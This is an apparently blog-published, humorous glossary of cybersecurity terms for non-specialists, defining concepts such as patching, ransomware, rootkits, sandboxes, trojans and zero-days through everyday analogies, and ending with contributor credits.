Throughout history each era has had its helpers. The unsung heroes or heroines that gladly follow the main character of the plot through thick and thin, often carrying the luggage or cleaning up after whatever skirmish just happened. They can be found clutching bottomless bags filled with weapons, pulling handy levers upon request, or robbing the cemetery for another spare set of limbs for the latest creation. In our digital realm, these are the minions, the carriers of antenna, the first one over the barbed wire fence, the ones to both find AND fetch the Starbucks, or the ones coding the exploit at 3am while the head geek’s taking 40 winks on the sofa.
The unsung underlings
National Institute of Standards and Technology (NIST)
Somewhere in a building, hidden in a room, buried in filing cabinet, hidden behind a wall, there’s probably a standard for how to describe NIST, let alone a set of standards and measurements for how to actually build this compendium… Welcome to NIST, I always think of it as that “rooms” where people are just “thinking shit up” (to quote Bruce in Armageddon). They’ve done a lot for the technology arena in bring a well-defined, and level of standards and methodologies to the table, now all we have to do is work out how to get folks to pay attention.
Our physical measuring tape in a digital world
National Security Agency (NSA)
The National Security Agency started life just before the USA entered the FIRST World War (April 1917) back then it was the Cable and Telegraph Section. It had a rocky and somewhat patchy existence until November 4 th, 1952 when the Armed Forces Security Agency was renamed the NSA. (including in 1929 when it was shut down because “Gentlemen do not read each other’s mail”) The agency these days is considered a center of excellence for cryptanalytic research and other matters pertaining to surveillance in both the physical and digital domains. Oh, and yes, nowadays they DO read the emails IF they’ve got the time…
No Such Agency (Once upon a time its existence WAS classified, and you couldn’t buy souvenir mugs or shirts!)
The digital highway is what we used to call it, then it got faster, and we called it the information superhighway. Once we got bonded T1’s and fiber, we moved to the WORLD wide web, and on from there. We lost the highway idea around the 90’s BUT it’s still a good reference point to describe what a network is. Information travels, is rarely static (like humans), and it uses transport to move (as we do) so the road system works to describe what a network is. Heck, it even mimics real life with regards to seasons. Your favorite sites slow down around the holidays because of the volume of traffic…just the same as the roads clog up as you get closer to the shopping mall etc.
The digital autobahn
Just as you need (or should have) a license to drive in some places, the same analogy is true of computer access. To be allowed to connect, talk, and interact with systems on the network, you have to have a license. These are often issued to make sure the system is safe, secure, managed, sorted out, AND isn’t going to go driving the wrong way down the Information Superhighway…
Your digital driver’s license
Network Access Control (NAC)
NAC is the enforcer or the toll booth operator that’s checking to make sure that you have the right license, for the right place, right time, AND that it’s valid, etc. IF you’re out of luck and something is wrong, you can expect to be sent to the eternal on-ramp until someone comes along and sorts you out. (Ok, I promise that’s the last of the car/highway analogies for now!)
The toll booth operator with a grudge...
See Scam. Nigeria is a republic, ruled by a democratically elected president, so no prince here.
Nigeria is also a federation of 36 states, so no central prince, however, there ARE parts of the country that still maintain a tribal or ethnic view that a person can be chosen to represent their community or town, however their jurisdiction is limited, and the chances of them having a few million in the bank JUST to send to you is so far from reality we’ve not even discovered the science to find it. So, don’t respond, ever. Please.
Imagine sitting in the middle of the most crowded street in your area. You are painting or writing a book and EVERYONE can come and look at it, watch you work, and eventually provide feedback to you. They can also use your writing or picture for their own use or simply take it and change it. (Salvador Dali style if they so choose…) In the digital world, this is open-source software. You get to build things and then put them out there for others to use, study, or change if they so feel inclined. What it means is you potentially have an amazingly diverse set of eyes and keyboards looking at your work.
The logic behind open source is collaboration and cooperation. When it comes to software code, we ALL make mistakes (lots of them sometimes) so the more eyeballs that are on the code, then the theory goes, the better chance that the code has less mistakes in it.
Many hands (hopefully) make light work…
Open Systems Interconnect (OSI)
Usually referenced as the OSI Model, it’s how we describe how things talk and interact with each other across both the physical and digital realms. The model takes into consideration every step of the way from you pushing a button (or yelling at the phone) through the application, the operating system, the stuff that actually moves your message through to the systems that perform all those functions. Think of it as a route map that all systems use to find their way around both realms as they try to work out what the heck TO Do with that instruction you gave them. It’s also the reference guide that we use when building new applications or systems. Like a basic plan for building a house, you know you need some fundamental things to make it work, the OSI Model is that set of guides.
How do computers shake hands?
Operational Technology (OT)
Closely related to the Industrial Control Systems definition (ICS), this is the hardware and software that is used to detect and manage the physical industrial control processes, devices, and infrastructure. It’s the device that measures temperature or the flow of water in a pipe, the widget that checks to see if the valve is on or off and tells it what to do next. All of these and 1,001 other such things are the actual pieces of physical technology that keep the world ticking.
It might be simpler to explain what a password should NOT be, than what it is! Anyone using 123456, 111111, 123456789, etc. is doing nothing more than providing a quick fence hop into their data and rarely would any of us consider it a password. IF, however we break down what it IS, we arrive at the simple fact that it’s a word, phrase, string of characters or something similar that must be regurgitated to gain access to whatever you are looking to get into. More often than not it’s found on a Post-It-Note attached to the computer, or under the keyboard, however we DO encourage people to store them in nice, comfortable, warm and safe things like password vaults or managers…
The simplest secret that allows you into the digital world...
This is the process, the policy, and the control that helps manage ALL those patches across ALL those vendors and systems that you have, think you have, thought you’d gotten rid of in the cloud, AND the ones you just found behind the cabinet. Now, some of those systems no longer can be patched, or the companies have gone out of business, OR quite simply, the cost of maintenance prices you out of being able TO patch them. So then, patch management takes on the supporting role of helping you to identify risks and gaps in your environment. It’s an often-overlooked part of IT/InfoSec support and typically doesn’t get the attention necessary for folks to be able to make a decent job OF it. We often forget that the very systems we’ve purchased are still being worked on, developed, updated, and in many cases patching is a constant cyclical process that has to happen to maintain integrity…just like your socks, proper maintenance and support is critical.
The process by which your holey socks are identified AND fixed…
Remember the days when you used to darn a sock or sew a patch onto that pair of trousers? This is the digital version. Software, systems, and everything we make in the electronic and digital world has bugs or errors in it. Sometimes those errors only come to light (or are found) when you and I are mashing away on the keyboard in a manner NO tester or programmer ever thought possible OR we worked out how to hold down ALL the keys at once just to see what happens. The program breaks. (just as your clothing tears or wears a hole etc.) Patching is simply another piece of software that is laid over the top of (and sometimes replaces) some of the code that you already have. Repairing the hole, the error, or the bug, and allowing you and I to get back to doing things they never thought possible.
The digital equivalent of darning your socks…
Payment Card Information (PCI)
The PCI requirements are a set of standards and guidelines that folks who handle YOUR credit card are meant to adhere to. The standards cover all aspects of how someone takes, holds, stores, moves and processes the data that’s on YOUR credit card. The logic FOR the standards is to try and cut down on credit card fraud by making it harder for adversaries or criminals to steal the information when YOU hand it over to other people. (For those folks who don’t know that black stripe on the back of your credit/debit card hold a LOT of very personal data that is used for both validating you and the card AND can be used to re- create/steal for criminal purposes.)
Compliance is NOT security, ‘nuff said
Penetration Testing (Nice Version)
Think of it as the digital equivalent of a friendly break in where the burglar leaves helpful notes ALL over the house reminding you to lock your doors, to turn on the cameras, not to leave the keys for the cars on the shelf, and that you should really change the combination to the safe. You get all the lessons, you have all the information at your fingertips to help you improve and make changes, AND you have the logic as to “why” to do this. Testing and assessing done in collaborative settings can help all parties learn about themselves in a manner that’s controlled, safe and educational.
Realism without the lawyers and headaches
Penetration Testing (The Rant)
If approached incorrectly, it can be an outdated and outmoded method of shaming a company into paying more money for binky shit that they don’t need. IF done right (and there’s only a few places that are good), it can be a collaborative, cooperative experience where both parties benefit.
Penetration testing puppy mill, a company that employs cheap bodies, gives them crappy tools and then rebrands Nessus reports as “assessments” and charges for the pleasure. (See Scams)
Even within our own industry, we can’t agree what a penetration test is, or what a scan or an assessment is, therefore I’m not even going to attempt to do it. Suffice to say, when someone wants to “test” you, make sure you know what you’re getting into, what questions to ask, and expectations to have, AND make sure it’s a reputable company that WILL take the time to educate you, help you improve, and isn’t in it for just the money.
You’re naked, and they have 50 gallons of lube and rubber gloves.
Personally Identifiable Information (PII)
It’s YOUR information that is stored and identifies YOU. Your full name, address, social security number (National Insurance Number for folks NOT in the USA), your passport, driver’s license, bank, or other numbers or information that point the large digital finger in YOUR direction. Many states are now passing laws to better protect how that data is handled by the very companies you hand it to and what to do (whom to notify, apologize to, etc.) when they eventually lose it.
The catalog of who YOU are...
We all recognize it when it’s pointed out, yet, many of us still fall for the digital confidence trickster that masquerades as a trusted entity. The lawyer claiming to represent your long lost, deceased uncle who left you millions, or the dying elderly lady who wants to give you all her money because you’re kind, or the banker in some far flung country who’s willing to share the entire content of the safe with you IF you’ll split it with them AND if you’ll send them some money so they can send you LOTS more… Don’t fall for these OR any of the other scams PLEASE!
Fool me once, shame on you, click it twice, shame on me...Digital confidence trickster...
A form of active wiretapping, typically done (a long time ago) when we would sneak into a connection while it wasn’t active (between conversations) and actively get “between the lines” to listen in on conversations, monitor status, and other things. In networking terms piggybacking was also used when sending an acknowledgement packet WITH the response/data packet at the same time (as one packet, thereby saving bandwidth).
In the physical world it’s when someone follows you into a building OR you are civilized and open the door FOR them, often without asking them to badge in, provide identification, etc. It’s a social engineering attack that targets human courtesy, often called tailgating.
Leaving your computer for two minutes to go get that cuppa coffee? Thanks, I’m going to wait for you to leave, sit down AT your desk (because you didn’t lock your computer) and piggyback on your access to do what I want/need to do while I’m in the building and guess who takes the blame?
Bad Internet? Terrible connection from one side of the house or building…wait! Your neighbor’s got open wireless, where’s the harm in piggybacking off their signal (although this is iffy given the idiots at Xfinity/Comcast openly LEAVES a names WiFi account “open” on YOUR network for anyone who’s THEIR customer to use…
Sneaking in UNDER the radar…
Good old standard text that hasn’t been scrambled...the stuff you are reading right now is plain text. You can (hopefully) make sense of it AND it’s legible! Now, while it’s going between you and I, it might get scrambled, (that “S” in HTTPS means the information has some mathematical wizardry applied to it, however, IF everything is working right, you should be able to sit down and be able to read it in the same way you do the newspaper or your favorite book.
The part of the digital conversation you can understand
Think of them as additional digital Lego pieces that you can add to your existing system. You want larger Lego wheels, then you CAN have them. (a custom browser plugin that runs videos) You want tinted Lego windows, install the plugin FROM the distributors site (NOT a 3rd party location) and you’ve got them.
We’ve covered the IP address elsewhere in this compendium, so now we’ve arrived AT the destination, we have to work out how we’re getting into the darn place. This is where ports come in. Think of them as all the various ways INTO your target address, they are the doors, windows, chimney, and coal holes of the digital
world. In the digital house, there’s 65,535 ways in though, ranging from the normal (80/443, HTTP/HTTPS your web browser) to email on 110/995/143/993 (POP3/IMAP) through to the obscure (32887/Ace of Spades) or the more infamous Back Orifice on 31337.
65,535 front doors into your house…
The digital version of being evicted and locked out of your digital life. It’s a type of computer program that, once it has access to your systems can/may and often will encrypt the data, the drives, and then take a copy, leaving you with a ransom note and a limited amount of time to pay up or suffer the consequences. It is simply
there to harvest money from people, companies, and systems that are especially vulnerable or not well maintained. It is an escalation of simply infecting your system and seeing IF you can recover.
The digital gun to your head
You know that digital picture puzzle or jumbled mess that tries to get you to prove you’re a human? That’s reCAPTCHA. Find the busses, then the fire hydrants, how about the cross walks, bikes, boats, and traffic lights? If text and numbers are involved, you may think Picasso was behind the whole thing as your brain tries to unscramble the mess in front of you. We’d prefer a simple “Click here if you’re not a robot.” Unfortunately, programmers and scammers are a little more cunning than that these days!
Remember the sliding puzzle? This is its revenge…
Once upon a time, we had one computer. It was in a room. To use the computer, you went INTO the room. To do anything TO the computer, you went INTO the room. Heck, to even know there WAS a computer you had to find the room… THEN, progress happened and the computer went into every room in almost every house, car, office, factory, doorway, and pocket in the land. The problem then became one of how do folks that need to fix the computers get TO them? Welcome to remote access...the ability to sit at one computer and appear as if you are working at a different one half way round the globe. Nowadays, we use remote access for all sorts of things; doorbell cameras, remote support, telesurgery (remote control of the things operating on you), among a host of other applications.
It’s NOT always your hands on YOUR keyboard…
Everything we do involves risk. Driving down the road, there’s the potential (risk) of having an accident. Getting on the internet, you always have the risk of compromise. We try to do many things to reduce risks around us. Following the rules of the road, watching out for people not paying attention, and making sure our cars are in good running order are some examples in the real world. The digital version of this would be paying attention and thinking before clicking, keeping your system updated, and having some basic protections in place. Really, it’s a matter of knowing, understanding, AND being aware of your surroundings. This is true in both the physical and digital realms. Within companies, there are business risks, financial, material, manufacturing, human, and technical risks. Within IT and InfoSec, it’s our role to help folks understand and reduce those risks wherever possible.
Death, taxes, and risk, the three constants of life
Welcome to an adversary (attackers, bad person’s) digital toolbox. The word comes from two familiar ones being smashed together. Root (the “GOD” mode in computing terms) and Kit. (exactly what it is) It’s the Swiss Army knife of the attacker, albeit in digital or code format. The idea is to be able to sneak into your system, drop my rootkit into your operating system and then be able to have all sorts of ways in, out and around without you knowing. I might have ways past your antivirus, or endpoint detection, ways to steal your keystrokes, watch your camera, or harvest your accounts, all with stealth AND be able to package the data up and send it out without you even knowing I’m there.
Adversarial Swiss Army knife…
You remember the days when the police used to stand in the crossroad directing traffic while standing on the podium? (Italy and India still have them…) That’s your router. The router’s main job is to take traffic and move it to the right place, sometimes also doing checks, inspections, and other things as it’s moving those packets.
Many of us have routers connecting our homes to the Internet (that box the cable provider gives you, that’s your router). It takes home traffic and moves it along to the Internet, often directing it along the way towards the right things you’re looking for.
It’s a little smarter than a bridge, repeater, hub, or a switch, or other devices you might find in a network as you can give it instructions rather than just hoping things go from point A-B.
Smarter than your average CAU
Rules (or Roles) Based Access Control (RBAC)
Simply put, these are sets of rules and regulations around objects. It might be data, it might be a computer, or a building, heck we can apply rules and roles to the very toaster you have at home. IF we use Talkie the Toaster as our example, the household might only be allowed to toast things between 0600-0800 because after that it’s too loud OR scares the dog. Oh, and you can only use the toaster IF you’re wearing blue socks. Welcome to rules-based… Now, if Grandma comes to stay, then all bets are off, she can toast whenever she wants AND she’s allowed to toast muffins! Welcome to roles-based controls. Take these very same ideas and apply them to data and systems. (preferably without toasting the floppy disk!)
The right people, from the right place, at the right time ONLY
It’s a controlled digital testing environment, mimicking the real systems around you, that is often isolated FROM everything around it so you can play, explore, and experiment to your hearts content without damaging anything. Often you can find companies testing email attachments, suspect file,s and other oddities they’ve found on the Internet OR dragged in through email etc.
(You sometimes don’t know if a file has a virus until you can run it and you NEVER want to do that in anything that’s connected to the rest of the world…)
Somewhere to test a digital controlled explosion...Your digital padded cell
The world of fraud and the tricksters themselves have found the Internet... and with it, they can scheme and scam tens, hundreds, and thousands of people at once. Where before, they were the street hustler, peddler, or petty criminal, they can now, with the aid of a computer and some simple programs; trick targeted groups of people in ever increasingly innovative ways.
There is no pot of gold at the end of the rainbow, the cake is a lie, the check is not in the post, you are NOT a winner, and no, you’re not getting your long-lost uncle's inheritance from outer Mongolia IF you just pay a little something up front.
1001 digital ways to part you from your money
A set of instructions in a chosen computer language that reads like a regular to-do list. Think of it as a set of commands that the computer understands (and often we can still read).
Digital to-do list for the computer
Secure Socket Layer (SSL)
This is the older way that we used to communicate securely. The data was encrypted/scrambled in a way where only the sender and recipient understood the instructions. It was the primary way to make sure what you typed into your web browser was only seen by you and whomever you were talking with, buying something from, or selling to (or many other uses to make sure that data wasn’t sent “in the clear” (not encrypted)). It’s now been superseded by Transport Layer Security as a more robust and
secure way to send data.
Our digital carrier pigeon WITH a padlock…
This is where the proverbial rubber meets the road. This is where we have to take what we know about the state of the digital union (and it’s not good) and somehow describe it in terms that everyone else can understand. This is ALL about how WE take what we know and drop it into your noggin. Awareness in its natural state is being conscious of something...to perceive, be aware of, feel, or become cognizant of the ONE simple fact. YOU, in the digital world, are nothing more than a walking chicken McNugget for everyone else unless you wise up, learn some of the basics, and start to defend yourself AND others around you.
Instead of taking up Yoga or Tai-Chi, first take up the digital equivalent. You’ll find it much more rewarding AND I promise you that your future self will appreciate the reduction in stress, ALL without having to bend your left leg around your right ear…
Think before you click! Oh and by the way, we have our own Security Awareness Training!
It’s the checkpoint, you know, the one where you wait in line while someone looks at you, then at your picture in their database… if there’s a match and it’s got notes in red, then you’re going to be spending a LONG time explaining why in a small room. IF not, then you get to go on with your journey in (mostly) peace and quiet. The upside is the matching happens quickly. The downside is a quickly applied “digital moustache” or “digital hair coloring” changes your identity enough so you slip through the net. In the antivirus or endpoint world, this is unfortunately one of the challenges many folks face. We just can’t keep up with the ever-changing landscape and must work out different methods for identifying you and your fake facial hair and dyed wig…
A digital border guard, good but not infallible
Social Engineering Attack
The art of using deception, manipulation and other tactics against targeted individuals in order to gain information, trust, or to simply get them to perform certain actions on your behalf. It relies heavily on human interaction and often involves tricking or confusing individuals into deviating from standard practices in order to allow the attacker to gain legitimate, authorized access
to systems or information.
The art of human manipulation
While we talked about scripts above being a set of instructions, we tend to think of software as being a whole collection of those instructions (sometimes we’re talking Tolstoy’s War and Peace scale instructions) to enable someone to work on the computer OR for the computer to simply function. Your operating system is considered software (unless it’s Unix in which case it’s considered an unfathomable jumble of madness). Your web browser is another software package (again, unless it’s Exploder or Chrome, in which case some would consider it malware or spyware). It’s the software that allows us to interact with the very silicon systems
all around us.
Our interface into the digital realm
Software as a Service (SAAS)
Remember when you used to go and buy your software in a box? It came on a CD or floppy disk (yea, some of us are that old). Well, this is the antithesis of that scenario. Many of us experience this new way of working through our subscriptions to music streaming services or movie systems. SaaS is simply a way to rent you something for a defined period. You want an email server, then go buy the software, hardware, operating systems, and associated stuff, AND a couple of folks to run it OR for $9.99 a month you can rent (SaaS) a fully functional mailbox WITH all sorts of support from the main protagonists out there. Same with all sorts of things (sales tracking, project management, etc.)
The age of rent vs. own comes to the digital era.
Life was simpler in the old days... you had someone in the bushes watching the house with a good set of binoculars, you knew there were bugs in the lights, behind the paintings, and under the table… we miss those days of simple spying. Nowadays, we have software that sits, hiding on your systems, watching your keystrokes, taking pictures of your screen, or simply watching and listening for whatever it’s looking for. It can also be listening to your voice (or the keyboard movements) as well as anything else in the house or office that takes its fancy… all without us often knowing it’s happening.
Our unwanted digital shadow
The art of hiding in plain sight through the use of picture, video, or music files with hidden messages concealed within. Think of this as those nested Russian dolls. What you SEE is a single, large, well-manicured doll…what’s hidden are several others inside, often with their own messages, agendas, or specific artwork. The practice goes back at least 1,500 years and is often forgotten in pursuit of cryptography (talked about elsewhere here…) Embedding (hiding) a file within a file…
There's more to the Mona Lisa than meets the EYE...
A very targeted piece of software that was specifically written to attack Siemens equipment (and the associated Windows based industrial control software) that was running various tasks within the critical infrastructure industry. (power, heating, light, and in the case of Iran a critical piece of their nuclear program) The software program was successful in its task of infiltration and destruction, however there’s much debate over the overall effect it had ON the very program it targeted in Iran. Over the years, there’s been much speculation and conjecture as to who’s hands were on the keyboard and what their motivations were for releasing it.
Overclocking a centrifuge is a lot more complicated than it sounds…
(Thanks Loannis Samantouros)
You know when you cut corners with that piece of code, or that new walkway, or anything where speed is prioritized over doing it right… Welcome to technical debt. We’ve called it other things over the years, but the basic premise is you ALWAYS have to pay the piper. There’s never an escape (unless you sell the company
at which point it becomes someone else’s problem…welcome to the issues of IoT!)
Digital short cuts coming back to bite…
See Two factor authentication, however it’s typically the way to check that you are who you say are by the company or website (bank, Amazon, etc.) sending a code to the phone THEY think you have (or you told them that you own). We talk a lot about multi-factor authentication being something you know, you are, or you own (pick two). So many times your phone becomes part of that equation. Its certainly NOT the most secure way to do two factors, but for many, it’s the most convenient.
It’s better than JUST a password, but only just…
Something that is likely to cause damage, harm, injury, OR a lot of paperwork for the lawyers and insurance folks… In our digital world, the concept of a threat is often attributed to a way into a company, their systems, software, databases, or something else that could be used to harm them (or others around them). We tend to talk about threats and how to reduce them, mitigate them, manage them, and deal with them. The challenge as we ALL know is that threats are all around us, and over our evolution, we’ve worked out how to manage them, mitigate them, and accept some of them. The digital world has come at us faster than many can adapt to and therefore the threats are often misunderstood, misinterpreted, OR quite simply ignored until too late.
Everything’s a threat, it’s simply a matter of HOW we deal with it…
This is the human portion of the “threat” we’ve talked about elsewhere in this compendium. This is the individual (or group thereof) that is the catalyst for the threat becoming a reality. This is where we go from the potential to the “where’s the Incident Response” book? You can consider the threat actor to also wear many hats. From the criminal, organized crime, hacktivist, spy, insider threat, or the unintentional “whoops” moment you experience when something happened that you just didn’t expect, anticipate, OR thought wouldn’t happen, (Because, let’s face it digital crime ONLY ever happens to someone else…) I’ve left OUT state sponsored or advanced threat actors because despite the media and Hollywood’s otherwise desire to see us all breached by China, Russia, Germany, NZ, or NK, the simple fact is, many of them aren’t interesting enough for them. So, welcome to the threat actor, the bag of squishy bits that sits between the keyboard and chair.
The human in the digital world.
Threat Intelligence Platform
Community Submission from Rachel Arnold:
We have a lot of friends with a lot of good vulnerability gossip that we just CANNOT wait to feed to YOU!
Transport Layer Security (TLS)
See Secure Socket Layer (SSL) but with added whoomph, handshakes, and mathematical subterfuge...
Turbo digital carrier pigeon with a much bigger padlock!
Trojan (or Trojan Horse)
The Greeks are going to have to take the blame for the name, because, if we believe the fables around 3200 years ago, they very nicely left a parting gift for their foes (a horse) which was taken into the city and
subsequently (much to the surprise of the folks who brought it INTO the city) was found to contain a squadron of warm, annoyed, and very much alive, armed enemies… Now, anyone that brings a heavy horse that seems to be breathing INTO a city they’ve been defending for years deserves to lose the fight. Best set fire to the darn thing outside the gate next time! However, in our digital world, hiding an attacking program inside a nice looking document, image, or file is the equivalent of what the Greeks did. SO, the next time someone tries to send you one of those Internet Cat memes, DON’T download it and go around to their house and set fire to their computer.
Beware of Geeks bearing gifts…
As in fantasy, so in digital… In the fantasy world, a troll is a mythical cave dwelling being (or under the bridge for a change of scenery) depicted in folklore as rarely helpful towards humans (or goats). In the digital world, it’s almost the same. They are often intentionally inflammatory aiming to upset or provoke their targets into an emotional response. As in the fantasy world, the general sentiment among the Internet is that the digital troll also needs to be thrown off the bridge into the gorge below.
Don't feed the trolls.
That’d be you, I, and about 4.5 billion of our closest friends on the Internet. We are all users OF the very systems we carry with us, access, and have integrated into our lives. In business speak, we often refer to end-users as those being the consumers OF the services that the IT teams have deployed. They are target users, and the very ones the entire InfoSec/Cyber world should be focused on better defending. They are our charges.
The first AND most important line of defense
Virtual Private Network (VPN)
It’s the digital equivalent of having your OWN lane on the crowded highway, with your own security escort, knowing full well no pesky oiks or common folks are going to get in your way…. You have to use the same roads as everyone else (the Internet) yet you have your own lane everywhere you go that protects you from the uncouth rabble around you. Welcome to a “virtual” private network, it looks, smells, tastes, and feels the same as the real thing yet it’s overlayed on top JUST for you…
Your own Digital HOV lane…
A little history...Computer viruses have been around for the last 50 years…the first one targeted the DEC systems linked to the fledgling thing we now call the Internet (ARPANET). For a while, it was fairly quiet. Then, in 1986 and 1988, we had Brain and The Morris, two programs that spread (like a traditional human virus) to infect computers through various security holes or communication protocols. (Worth noting that The Morris infected (accidentally) around 15,000 computers which back in the 80’s was about the sum total OF the Internet.) Basically, take the same thing a biological virus does and bring it into the digital world…. Infect something, copy one’s self, and then look for new hosts.
As in reality, so in digital…
Welcome to you, yourself, and your place in the digital realm. You, the breathing bag of skin, water, and squishy bits. You are the wetware, the thing sitting between the keyboard and the chair. When we talk about a wetware attack, we’re talking about how to circumvent you, how to manipulate you, or “encourage” you to do something you’d not ordinarily do. (like lend money to a total stranger just because they’ve got their own bank in Kenya).
There ARE wetware computers, interfaces, and systems. These typically are bio implants, software designed to interface with neurons or other systems (muscles, etc.) and other interface architectures that allow a human to work more closely or directly with the digital world around them.
The organic bit between the keyboard and chair
See Black Hat. This is the other end of that spectrum and also needs to be learned from and never used in the context of IT/InfoSec/Cyber ever again.
There are NO hats.
It’s a living, breathing digital Encyclopedia Britannica for everything we think we know, compiled by everyone on the planet, curated by volunteer editors, and designed to answer as much as it can about anything IN the known universe. It is one of the (if not THE) largest general reference works on the Internet.
Community brain trust
Won the Lottery
No, you didn’t win, neither did you come in second, or get another bit of the apple, and even (by some fluke) you DID win, do you really think they’d ask you to either prove who you are OR ask you to pay THEM money for the money they owe you? No. Never. It’s NOT how it works. So, don’t hand over your identity, your money EVER. Please.
A more independent and intelligent virus. (See Virus) Think of it as the teenager that’s grown up a bit, has gone out into the world on their own, and is exploring around. There’s no need (or little need) for interaction by the host… They just get on with things and wander round. They’re not attached anymore, they like their own company, and can be fairly independent. They’ve NOT worked out how to grow up more or adapt, but they’re still bloody annoying…. just LIKE teenagers. (polymorphic)
Sneaky virus with independence and intelligence
The cynic in me wants to tell you it’s a marketing term or buzzword that’s used to incite panic, fear, and uncertainty into the population to get them to buy more stuff to make them feel safer and protected. However, that aside, there IS a logical explanation for what a 0-Day, or zero-day is, and it’s simply the fact that some enterprising individual, team, or nation state found a flaw in the system that wasn’t discovered during the design, build, testing, or QA process. It’s like stumbling upon that hidden room that nobody knows about by twisting the chandelier 90 degrees… The owner goes, “Damm, didn’t know about that.” The designer goes, “Hmmmm, that’s new…" The testing team wants to talk with you about HOW you plan that AND you’re sitting there with the keys to the kingdom that nobody knows about. The question then is, what ARE you going to do?
Didn’t see that one coming….Undocumented features
LinkedIn folks who have helped with some of this:
- Paul DeAngelis - Data analyst, data modeler, and systems analyst with experience in Insurance and Pharmaceutical Safety
- Gary Hayslip - Chief Information Security Officer at
SoftBank Investment Advisers "Vision Fund" | Board Advisor | Author | Mentor | Servant Leader
- Benjamin Corll - Passionate about all things concerning cyber security & data protection
- Mara Calvello - Senior Content Marketing Specialist at G2
- Jennifer Barg - Project Manager and Squirrel Hunter at HillBilly Hit Squad
- Jakob Nelson - Penetration Tester, Intel Analyst, and Undergeek in residence at HillBilly Hit Squad
Sources for some of the inspiration: